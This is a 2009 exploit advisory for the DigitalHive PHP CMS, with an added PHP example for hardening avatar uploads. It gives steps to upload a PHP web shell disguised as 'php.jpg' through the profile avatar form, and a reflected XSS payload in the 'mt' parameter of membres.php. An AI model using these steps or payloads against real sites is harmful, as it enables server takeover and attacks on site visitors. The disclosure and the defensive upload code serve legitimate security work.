Digital Hive - Multiple Vulnerabilities

EDB-ID: 10427
Author: ViRuSMaN
Type: webapps
Platform: Linux
Published: 2009-12-14

[-]##############################################################
|
| DigitalHive Remote File Upload Vulnerability
|
| Author : ViRuSMaN
|
| Contact : v.-m@live.com
|
| Home : Islam-Attack.CoM , HackTeach.OrG
|
| Download :http://www.digitalhive.com/base.php?page=site/telechargements.php&var=accueil
[-]##############################################################
|
| Exp:
|
| 1- First, sign up on the forum here: http://localhost/[script]/base.php?page=inscription.php
|
|
| 2- Then go to your profile here: http://localhost/[script]/base.php?page=compte.php&var=accueil and click "modfier"
|
|
| 3- Now upload your shell in "php.jpg" format
|
|
| 4- Finally, right-click the icon shown under "Apparence", then copy the link to your shell.
|
[-]#############################################################
|
|Greets : All members of islam-attack.com , hackteach.org , s3curi7y.com & All Muslims
|
[-]#############################################################
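
The steps above depend on the profile picture upload accepting a file that is not really an image and serving it back under a name derived from the upload. As an added example (not DigitalHive's own code and not from the advisory's author), this is one way an avatar handler can be hardened in PHP; the function name `store_avatar`, the form field `avatar`, the size limits and the storage path are assumptions made for illustration.

```php
<?php
// Added example, not DigitalHive code. Field name, limits and paths are assumptions.
const AVATAR_MAX_BYTES = 524288;   // 512 KiB
const AVATAR_MAX_SIDE  = 1024;     // pixels
const AVATAR_MIME      = ['image/jpeg', 'image/png', 'image/gif'];

function store_avatar(array $file, string $destDir): string
{
    $tmp = $file['tmp_name'] ?? '';
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK || !is_uploaded_file($tmp)) {
        throw new RuntimeException('upload failed');
    }
    if (filesize($tmp) > AVATAR_MAX_BYTES) {
        throw new RuntimeException('file too large');
    }

    // Decide the type from the file's bytes. The client-supplied name and
    // Content-Type are ignored, so a "php.jpg" name gets no special treatment.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    if (!in_array($mime, AVATAR_MIME, true)) {
        throw new RuntimeException('not an accepted image type');
    }

    // Bound the dimensions before decoding to avoid decompression bombs.
    [$w, $h] = getimagesize($tmp) ?: [0, 0];
    if ($w < 1 || $h < 1 || $w > AVATAR_MAX_SIDE || $h > AVATAR_MAX_SIDE) {
        throw new RuntimeException('bad image dimensions');
    }

    // Decode and re-encode with GD: data appended after the image or stored
    // in metadata is dropped, and a non-image fails here.
    $img = @imagecreatefromstring(file_get_contents($tmp));
    if ($img === false) {
        throw new RuntimeException('image could not be decoded');
    }
    imagesavealpha($img, true);

    // Server-chosen name with one fixed extension; nothing from the client name is reused.
    $name = bin2hex(random_bytes(16)) . '.png';
    if (!imagepng($img, rtrim($destDir, '/') . '/' . $name)) {
        throw new RuntimeException('could not store image');
    }
    return $name;
}

// Hypothetical call site in the profile page:
// $avatar = store_avatar($_FILES['avatar'], '/srv/hive-data/avatars');
```

Re-encoding is not a guarantee on its own, so the destination directory should also sit outside the document root or be served with PHP execution disabled.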

==============================================================================
        [»] DigitalHive Multiple Vulnerabilities
==============================================================================

    [»] Script:             [ DigitalHive ]
    [»] Language:           [ PHP ]
    [»] Site page:          [ Hive is a system for easily and quickly creating a system ]
    [»] Download:           [ http://www.digitalhive.com/base.php?page=site/telechargements.php&var=dl&num=17 ]
    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & Sec-Attack.Com ]
    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===

        [»] http://server/[path]/base.php?page=membres.php&mt=[Xss Vuln]

===[ Live Demo ]===

    [»] http://server/base.php?page=membres.php&mt=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
